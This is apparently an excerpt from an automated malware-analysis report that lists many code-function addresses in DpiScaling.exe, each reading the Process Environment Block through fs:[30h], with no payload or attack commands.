          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04FE41E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_05024015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_05024015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04FD51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04FD51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04FD51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04FD51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F861A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F861A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04FD69A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F82990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_05012073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F7C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_05021074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F8A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F5B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F5B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F5C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F7B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F7B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F8513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F8513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F74120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F74120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F74120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F74120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F74120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F59100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F59100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F59100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_0501131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F82AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F82ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F6AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F6AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F8FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F552A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F552A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F552A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F552A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F552A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_05028B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F8D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F8D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_0500D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F9927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_0501138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_05025BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04FE4257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F59240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F59240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F59240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F59240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F94A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F94A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F7A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F7A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F7A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F7A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F7A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F7A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F7A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F7A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F7A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F5AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F5AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F55210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F55210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F55210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F55210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F73A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F68A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_0501AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_0501AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F803E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F803E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F803E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F803E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F803E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F803E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F7DBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04FD53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04FD53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_0501EA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F84BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F84BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F84BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_0500B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_0500B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_05028A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F8B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F82397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F61B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F61B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F83B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F83B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F5DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F5F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 5_2_04F5DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04E26CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04E26CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04E26CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04E614FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04E78CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04DB849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04DDA44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04DDAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04DDAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04DDAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04DDAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04DDAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04DDAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04DDAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04DDAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04DDAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04DDAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04DDAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04DC746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04E3C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04E3C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04E61C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04E61C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04E61C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04E61C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04E61C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04E61C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04E61C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04E61C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04E61C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04E61C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04E61C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04E61C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04E61C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04E61C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04E26C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04E26C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04E26C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04E26C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04E7740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04E7740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04E7740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04DDBC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04E6FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04E6FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04E6FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04E6FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04E58DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04E26DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04E26DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04E26DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04E26DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04E26DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04E26DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04DBD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04DBD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04DDFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04DDFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04E705AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04E705AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04DA2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04DA2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04DA2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04DA2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04DA2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04DD2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04DD2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04DD2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04DD2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04DD1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04DD1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04DD1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04DD35A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04DC7D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04DE3D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04E23540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04E53D40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04DCC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04DCC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04E78D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04E2A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04E6E539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04DD4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04DD4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04DD4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04DAAD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04DB3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04DB3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04DB3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04DB3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04DB3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04DB3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04DB3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04DB3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04DB3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04DB3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04DB3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04DB3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04DB3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04DD36CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04DE8EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04E5FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04E78ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04DB76E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04DD16E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04E70EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04E70EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04E70EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04E246A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04E3FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04DB7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04DB7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04DB7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04DB7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04DB7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04DB7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04E6AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04E6AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04DCAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04DCAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04DCAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04DCAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04DCAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04DB766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04DDA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04DDA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04E5FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04DAC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04DAC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04DAC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04DD8E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04E61608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04DAE620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04DE37F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04DB8794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04E27794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04E27794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04E27794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04E78F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04DBEF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 15_2_04DBFF60 mov eax, dword ptr fs:[00000030h]
